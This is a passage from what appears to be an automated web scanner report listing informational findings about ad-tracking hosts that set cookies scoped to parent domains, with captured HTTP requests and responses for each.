var ebPtcl="http://";var ebBigS="ds.serving-sys.com/BurstingCachedScripts/";var ebResourcePath="ds.serving-sys.com/BurstingRes//";var ebRand=new String(Math.random());ebRand=ebRand.substr(ebRand.index
...[SNIP]...
5.53. http://cf.addthis.com/red/p.json  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cf.addthis.com
Path:   /red/p.json

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /red/p.json?rb=0&gen=1000&gen=100&sid=4d9fa5c4fe37dbad&callback=_ate.ad.hrr&pub=acquisio&uid=4d97b40ad252fd37&url=http%3A%2F%2Fwww.pagevester.com%2Fen%2Fproduct%2FGoogle-Website-Optimizer.asp&9pvn5k HTTP/1.1
Host: cf.addthis.com
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh38.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg%3d%3d; psc=0; bt=; dt=X; di=%7B%7D..1302308295.1FE|1302308295.60|1302197723.66; uid=4d97b40ad252fd37; uit=1

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Expires: Sat, 09 Apr 2011 00:18:36 GMT
Set-Cookie: di=1302308295.60|1302308295.1FE|1302197723.66; Domain=.addthis.com; Expires=Mon, 08-Apr-2013 00:18:36 GMT; Path=/
Set-Cookie: bt=""; Domain=.addthis.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA"
Set-Cookie: dt=X; Domain=.addthis.com; Expires=Mon, 09-May-2011 00:18:36 GMT; Path=/
Content-Type: text/javascript
Content-Length: 88
Date: Sat, 09 Apr 2011 00:18:36 GMT
Connection: close

_ate.ad.hrr({"urls":[],"segments":[],"loc":"MjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NDAwVg=="});
5.54. http://cspix.media6degrees.com/orbserv/hbpix  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cspix.media6degrees.com
Path:   /orbserv/hbpix

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /orbserv/hbpix?pixId=1598&pcv=45&ptid=100&tpv=00&tpu=4d97b40ad252fd37&curl=http%3a%2f%2fwww.ingeniux.com%2fsolutions%2fwebsite_optimization HTTP/1.1
Host: cspix.media6degrees.com
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh38.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: acs=012020a1lj1wslxzt10; ipinfo=2lj1wsl0zijsvn5yhbqbe90httd3GK520752HF6QnyynflFbsgYnlreGrpuabybtvrfdfbsgynlre.pbz0; adh=1lj9vce16024uj30103r01GruURMxXs000oan4uj4012wv013qzqpMFFn000000; vstcnt=3lj1wsl011l054e0lw120206d1w05szf4f4ze120105szf4ei39120105szf4ei9p120108pef4ls72120100000; clid=2lj1wsl01171iolb30nur9ak08zjm0092p040f08409; rdrlst=40o0ej3lj1wsl000000092p041196ljawc7000000012p0110e1lj1wsl000000092p040g87lj1wsl000000092p0407tclj1wsl000000092p040o51lj1wsl000000092p0410rdlj8uur000000052p041202lj1wsl000000092p041200lj1wsl000000092p041192ljam70000000022p020faelj1wsl000000092p040xvclj1wsl000000092p040xullj1wsl000000092p0409kjlj1wsl000000092p0411zklj1wsl000000092p040ejblj1wsl000000092p0410telj89uh000000072p04066plj1wsl000000092p0407o9lj1wsl000000092p0410falj1wsl000000092p040xw9lj1wsl000000092p040x1plj1wsl000000092p0406o2lj1wsl000000092p0407gqlj1wsl000000092p04; sglst=20r0s61jlj1wsl000000092p040f084098y6lj1wsl000000092p040f084099eslj9vce00oan0042p040f04404ag2lj89uh02mhq0072p040f074075t1lj1wsl000000092p040f08409bnxlj1wsl000000092p040f08409bnzlj1wsl000000092p040f0840944tlj1wsl000000092p040f084095sxlj1wsl000000092p040f08409433lj1wsl000000092p040f084096dklj1wsl000000092p040f08409abelj1wsl000000092p040f084094oxlj1wsl000000092p040f08409ab5lj1wsl000000092p040f084099uslj1wsl000000092p040f084093l3lj1wsl000000092p040f08409b04lj1wsl000000092p040f08409bnhlj1wsl000000092p040f084097xwlj1wsl000000092p040f084095q9lj1wsl000000092p040f084099c4lj1wsl000000092p040f084090tilj89uh02mhq0072p040f07407b1elj1wsl000000092p040f0840940ulj1wsl000000092p040f084093s0lj1wsl000000092p040f08409acblj1wsl000000092p040f08409a76lj1wsl000000092p040f08409

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: CP="COM NAV INT STA NID OUR IND NOI"
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: acs=013020a0g1lj1wslxzt1b2pzxzt1b2pz; Domain=media6degrees.com; Expires=Thu, 06-Oct-2011 00:18:20 GMT; Path=/
Set-Cookie: adh=1lj9vce16024uj30103r01GruURMxXs000oan4uj4012wv013qzqpMFFn000000; Domain=media6degrees.com; Expires=Thu, 06-Oct-2011 00:18:20 GMT; Path=/
Set-Cookie: clid=2lj1wsl01171iolb30nur9ak0b2pz00a2q010f0940a; Domain=media6degrees.com; Expires=Thu, 06-Oct-2011 00:18:20 GMT; Path=/
Set-Cookie: orblb=""; Domain=media6degrees.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rdrlst=40p0ej3lj1wsl0000000a2q0110e1lj1wsl0000000a2q0110rdlj8uur000000062q010xvclj1wsl0000000a2q0109kjlj1wsl0000000a2q0111zklj1wsl0000000a2q010ejblj1wsl0000000a2q01066plj1wsl0000000a2q0110falj1wsl0000000a2q0106o2lj1wsl0000000a2q0107gqlj1wsl0000000a2q011196ljawc7000000022q0107tclj1wsl0000000a2q010g87lj1wsl0000000a2q010o51lj1wsl0000000a2q011202lj1wsl0000000a2q011200lj1wsl0000000a2q011192ljam70000000032q010faelj1wsl0000000a2q0110tyljczik000000012q010xullj1wsl0000000a2q0110telj89uh000000082q0107o9lj1wsl0000000a2q010xw9lj1wsl0000000a2q010x1plj1wsl0000000a2q01; Domain=media6degrees.com; Expires=Thu, 06-Oct-2011 00:18:20 GMT; Path=/
Set-Cookie: sglst=2110s8y6lj1wsl0b2pz0092p000f0040061jlj1wsl0b2pz0092p000f004009eslj9vce00oan0052q010f05405ag2lj89uh04po30082q010f08408bnxlj1wsl0b2pz0092p000f004005t1lj1wsl0b2pz0092p000f00400bnwljczik000000012q010f01401bnzlj1wsl0b2pz0092p000f0040044tlj1wsl0b2pz0092p000f004005sxlj1wsl0b2pz0092p000f00400433lj1wsl0b2pz0092p000f004006dklj1wsl0b2pz0092p000f00400abelj1wsl0b2pz0092p000f00400434ljczik000000012q010f014014oxlj1wsl0b2pz0092p000f00400bo1ljczik000000012q010f01401ab5lj1wsl0b2pz0092p000f00400ab6ljczik000000012q010f014019uslj1wsl0b2pz0092p000f004009ulljczik000000012q010f014013l3lj1wsl0b2pz0092p000f00400b05ljczik000000012q010f014017illjczik000000012q010f01401b04lj1wsl0b2pz0092p000f00400bnhlj1wsl0b2pz0092p000f004007xwlj1wsl0b2pz0092p000f004004wnljczik000000012q010f014015q9lj1wsl0b2pz00a2q010f0940a9c4lj1wsl0b2pz0092p000f004000tilj89uh04po30082q010f08408b1elj1wsl0b2pz0092p000f0040040ulj1wsl0b2pz0092p000f00400acaljczik000000012q010f01401acblj1wsl0b2pz0092p000f004003s0lj1wsl0b2pz0092p000f00400a76lj1wsl0b2pz0092p000f00400a77ljczik000000012q010f01401; Domain=media6degrees.com; Expires=Thu, 06-Oct-2011 00:18:20 GMT; Path=/
Set-Cookie: vstcnt=3lj1wsl011l064e0lw120206d1w05szf4ei39120105szf4f4ze120105szf4exr512010b2pz4ls721201000004ei9p120108pef; Domain=media6degrees.com; Expires=Thu, 06-Oct-2011 00:18:20 GMT; Path=/
Location: http://ib.adnxs.com/setuid?entity=25&code=1iolb30nur9ak
Content-Length: 0
Date: Sat, 09 Apr 2011 00:18:19 GMT

5.55. http://d.audienceiq.com/r/dm/mkt/44/mpid//mpuid/4608069584519221037  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d.audienceiq.com
Path:   /r/dm/mkt/44/mpid//mpuid/4608069584519221037

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r/dm/mkt/44/mpid//mpuid/4608069584519221037 HTTP/1.1
Host: d.audienceiq.com
Proxy-Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=4608069584519221037&mktid=35&mpid=-1&fpid=-1&rnd=8512174217442808463&nu=n&sp=n
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=8070649251602538122

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=8070649251602538122; Domain=.audienceiq.com; Expires=Thu, 06-Oct-2011 12:35:45 GMT; Path=/
Content-Type: image/gif
Content-Length: 43
Date: Sat, 09 Apr 2011 12:35:45 GMT

GIF89a.............!.......,...........D..;
5.56. http://d.audienceiq.com/r/dm/mkt/73/mpid//mpuid/4608069584519221037  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d.audienceiq.com
Path:   /r/dm/mkt/73/mpid//mpuid/4608069584519221037

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r/dm/mkt/73/mpid//mpuid/4608069584519221037 HTTP/1.1
Host: d.audienceiq.com
Proxy-Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=4608069584519221037&mktid=35&mpid=-1&fpid=-1&rnd=8512174217442808463&nu=n&sp=n
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=8070649251602538122

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=8070649251602538122; Domain=.audienceiq.com; Expires=Thu, 06-Oct-2011 12:35:45 GMT; Path=/
Content-Type: image/gif
Content-Length: 43
Date: Sat, 09 Apr 2011 12:35:44 GMT

GIF89a.............!.......,...........D..;
5.57. http://d.mediabrandsww.com/r/dm/mkt/3/mpid//mpuid/4608069584519221037  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d.mediabrandsww.com
Path:   /r/dm/mkt/3/mpid//mpuid/4608069584519221037

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r/dm/mkt/3/mpid//mpuid/4608069584519221037 HTTP/1.1
Host: d.mediabrandsww.com
Proxy-Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=4608069584519221037&mktid=35&mpid=-1&fpid=-1&rnd=8512174217442808463&nu=n&sp=n
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=4498968621943069278

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=4498968621943069278; Domain=.mediabrandsww.com; Expires=Thu, 06-Oct-2011 12:35:45 GMT; Path=/
Content-Type: image/gif
Content-Length: 43
Date: Sat, 09 Apr 2011 12:35:45 GMT

GIF89a.............!.......,...........D..;
5.58. http://d.p-td.com/r/dm/mkt/4/mpid//mpuid/4608069584519221037  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d.p-td.com
Path:   /r/dm/mkt/4/mpid//mpuid/4608069584519221037

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r/dm/mkt/4/mpid//mpuid/4608069584519221037 HTTP/1.1
Host: d.p-td.com
Proxy-Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=4608069584519221037&mktid=35&mpid=-1&fpid=-1&rnd=8512174217442808463&nu=n&sp=n
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=3581095438620356821

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=3581095438620356821; Domain=.p-td.com; Expires=Thu, 06-Oct-2011 12:35:45 GMT; Path=/
Content-Type: image/gif
Content-Length: 43
Date: Sat, 09 Apr 2011 12:35:45 GMT

GIF89a.............!.......,...........D..;
5.59. http://d.p-td.com/r/dt/id/L21rdC80L21waWQvMTgwNDg2NA/mpuid/4d97b063-cd55-fcc9-f79b-3dc3c331fd5b  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d.p-td.com
Path:   /r/dt/id/L21rdC80L21waWQvMTgwNDg2NA/mpuid/4d97b063-cd55-fcc9-f79b-3dc3c331fd5b

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r/dt/id/L21rdC80L21waWQvMTgwNDg2NA/mpuid/4d97b063-cd55-fcc9-f79b-3dc3c331fd5b HTTP/1.1
Host: d.p-td.com
Proxy-Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=4608069584519221037&mktid=4&mpid=1051202&fpid=-1&rnd=2332477709495562306&nu=n&sp=n
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=3581095438620356821

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=3581095438620356821; Domain=.p-td.com; Expires=Thu, 06-Oct-2011 12:35:52 GMT; Path=/
Location: http://sync.mathtag.com/sync/img?mt_sgld=
Content-Length: 0
Date: Sat, 09 Apr 2011 12:35:52 GMT

5.60. http://d7.zedo.com/lar/v10-003/d7/jsc/flr.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /lar/v10-003/d7/jsc/flr.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /lar/v10-003/d7/jsc/flr.js?n=1318&c=43/41&s=17&d=14&w=728&h=90&l=http://clk.redcated/go/248038904/direct;wi.728;hi.90;ai.206431965.206955035;ct.1/01%3Fhref=&z=144475929 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://redcated/APM/iview/248038904/direct;wi.728;hi.90/01?click=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZCBC=1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFgeo=2241452;expires=Tue, 10 Apr 2012 16:41:19 GMT;domain=.zedo.com;path=/;
Set-Cookie: ZEDOIDA=Ly@jTcGt89ZU50IFiGvPA5FH~041111;expires=Thu, 08 Apr 2021 16:41:19 GMT;domain=.zedo.com;path=/;
ETag: "7140dca9-4239-48dea89497900"
Vary: Accept-Encoding
X-Varnish: 2551699253
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=37
Date: Mon, 11 Apr 2011 16:41:19 GMT
Connection: close
Content-Length: 3092

// Copyright (c) 2000-2008 ZEDO Inc. All Rights Reserved.

var w0=new Image();

var zzStr="q=;z="+Math.random();var zzSection=17;var zzPat='';

var zzhasAd;


               
...[SNIP]...
5.61. http://data.adsrvr.org/map/cookie/google  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://data.adsrvr.org
Path:   /map/cookie/google

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /map/cookie/google?g_uuid=CAESEH8TJy1DtAWkatR5O_JKSYo&cver=1 HTTP/1.1
Host: data.adsrvr.org
Proxy-Connection: keep-alive
Referer: http://ad.adsrvr.org/container/7j9i29e.1.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TDID=21cdbada-af4d-4bb4-a408-f80583854814

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Cache-Control: private,no-cache, must-revalidate
Content-Type: image/gif
P3P: CP="NOI DSP COR CUR ADMo DEVo PSAo PSDo OUR SAMo BUS UNI NAV"
Date: Sat, 09 Apr 2011 00:19:02 GMT
Pragma: no-cache
Set-Cookie: TDID=21cdbada-af4d-4bb4-a408-f80583854814; domain=.adsrvr.org; expires=Mon, 09-Apr-2012 00:19:02 GMT; path=/
Set-Cookie: X-Mapping-fjhppofk=56D14B6C0CC14A5761E9A7895E1F89AF; path=/
Content-Length: 70

GIF89a...................!..NETSCAPE2.0.....!.......,................;
5.62. http://ds.addthis.com/red/psi/sites/www.ingeniux.com/p.json  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ds.addthis.com
Path:   /red/psi/sites/www.ingeniux.com/p.json

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /red/psi/sites/www.ingeniux.com/p.json?callback=_ate.ad.hpr&uid=4d97b40ad252fd37&url=http%3A%2F%2Fwww.ingeniux.com%2Fsolutions%2Fwebsite_optimization&1rvjqwy HTTP/1.1
Host: ds.addthis.com
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh38.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg%3d%3d; dt=X; di=%7B%7D..1302197723.1FE|1302197723.60|1302197723.66; psc=4; uid=4d97b40ad252fd37

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 332
Content-Type: text/javascript
Set-Cookie: bt=; Domain=.addthis.com; Expires=Sat, 09 Apr 2011 00:18:15 GMT; Path=/
Set-Cookie: dt=X; Domain=.addthis.com; Expires=Mon, 09 May 2011 00:18:15 GMT; Path=/
Set-Cookie: di=%7B%7D..1302308295.1FE|1302308295.60|1302197723.66; Domain=.addthis.com; Expires=Mon, 08-Apr-2013 00:18:15 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA"
Expires: Sat, 09 Apr 2011 00:18:15 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 09 Apr 2011 00:18:15 GMT
Connection: close

_ate.ad.hpr({"urls":["http://pixel.33across.com/ps/?pid=454&uid=4d97b40ad252fd37","http://cspix.media6degrees.com/orbserv/hbpix?pixId=1598&pcv=45&ptid=100&tpv=00&tpu=4d97b40ad252fd37&curl=http%3a%2f%2
...[SNIP]...
5.63. http://ds.addthis.com/red/psi/sites/www.marqui.com/p.json  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ds.addthis.com
Path:   /red/psi/sites/www.marqui.com/p.json

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /red/psi/sites/www.marqui.com/p.json?callback=_ate.ad.hpr&uid=4d97b40ad252fd37&url=http%3A%2F%2Fwww.marqui.com%2Fcompany%2Fcontact-us%2F&ref=http%3A%2F%2Fwww.marqui.com%2F&18q07bs HTTP/1.1
Host: ds.addthis.com
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh38.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg%3d%3d; uit=1; di=1302308295.60|1302308295.1FE|1302197723.66; dt=X; psc=4; uid=4d97b40ad252fd37

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 321
Content-Type: text/javascript
Set-Cookie: bt=; Domain=.addthis.com; Expires=Sat, 09 Apr 2011 00:21:59 GMT; Path=/
Set-Cookie: dt=X; Domain=.addthis.com; Expires=Mon, 09 May 2011 00:21:59 GMT; Path=/
Set-Cookie: di=%7B%7D..1302308519.1FE|1302308519.60; Domain=.addthis.com; Expires=Mon, 08-Apr-2013 00:21:59 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA"
Expires: Sat, 09 Apr 2011 00:21:59 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 09 Apr 2011 00:21:59 GMT
Connection: close

_ate.ad.hpr({"urls":["http://pixel.33across.com/ps/?pid=454&uid=4d97b40ad252fd37","http://cspix.media6degrees.com/orbserv/hbpix?pixId=1598&pcv=45&ptid=100&tpv=00&tpu=4d97b40ad252fd37&curl=http%3a%2f%2
...[SNIP]...
5.64. http://h.zedo.com/init/0.4907234441488981/g.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://h.zedo.com
Path:   /init/0.4907234441488981/g.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /init/0.4907234441488981/g.gif HTTP/1.1
Host: h.zedo.com
Proxy-Connection: keep-alive
Referer: http://redcated/APM/iview/248038904/direct;wi.728;hi.90/01?click=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZCBC=1; FFgeo=2241452; ZEDOIDA=Ly@jTcGt89Y-7tVXMtikPSik~041111

Response

HTTP/1.1 200 OK
Date: Mon, 11 Apr 2011 16:41:19 GMT
Server: ZEDO 3G
Set-Cookie: FFgeo=2241452; path=/; EXPIRES=Tue, 10-Apr-12 16:41:19 GMT; DOMAIN=.zedo.com
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Content-Length: 42
Expires: -1
Pragma: no-cache
Cache-Control: no-cache
Connection: close
Content-Type: image/gif

GIF89a.............!.......,...........D.;
5.65. http://h.zedo.com/init/0.6948210536502302/g.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://h.zedo.com
Path:   /init/0.6948210536502302/g.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /init/0.6948210536502302/g.gif HTTP/1.1
Host: h.zedo.com
Proxy-Connection: keep-alive
Referer: http://redcated/APM/iview/248038904/direct;wi.728;hi.90/01?click=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZCBC=1; FFgeo=2241452; ZEDOIDA=Ly@jTcGt89Y-7tVXMtikPSik~041111

Response

HTTP/1.1 200 OK
Date: Mon, 11 Apr 2011 16:41:19 GMT
Server: ZEDO 3G
Set-Cookie: FFgeo=2241452; path=/; EXPIRES=Tue, 10-Apr-12 16:41:19 GMT; DOMAIN=.zedo.com
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Content-Length: 42
Expires: -1
Pragma: no-cache
Cache-Control: no-cache
Connection: close
Content-Type: image/gif

GIF89a.............!.......,...........D.;
5.66. http://ib.adnxs.com/ab  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /ab

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ab?enc=ZWZmZmZmEUDv12SNeugPQAAAAAAAAAhA79dkjXroD0BmZmZmZmYRQJ4HxOaAPCZQ8f5MdWfsOnjVLKNNAAAAANBJAwBUAwAANQEAAAIAAACqJQIAmmYAAAEAAABVU0QAVVNEACwB-gCyE7YCSQwBAgUCAAIAAAAAAyGNjAAAAAA.&tt_code=62967&udj=uf%28%27a%27%2C+537%2C+1302539477%29%3Buf%28%27c%27%2C+5740%2C+1302539477%29%3Buf%28%27r%27%2C+140714%2C+1302539477%29%3Bppv%28783%2C+%275775370096474326942%27%2C+1302539477%2C+1302971477%2C+5740%2C+26266%29%3B&cnd=!JBXRQgjsLBCqywgYACCazQEotgUxZmZmZmZmEUBCEwgAEAAYACABKP7__________wFIAFAAWLInYABotQI.&referrer=http://www.foxnews.com/politics/index.html&pp=2.60 HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
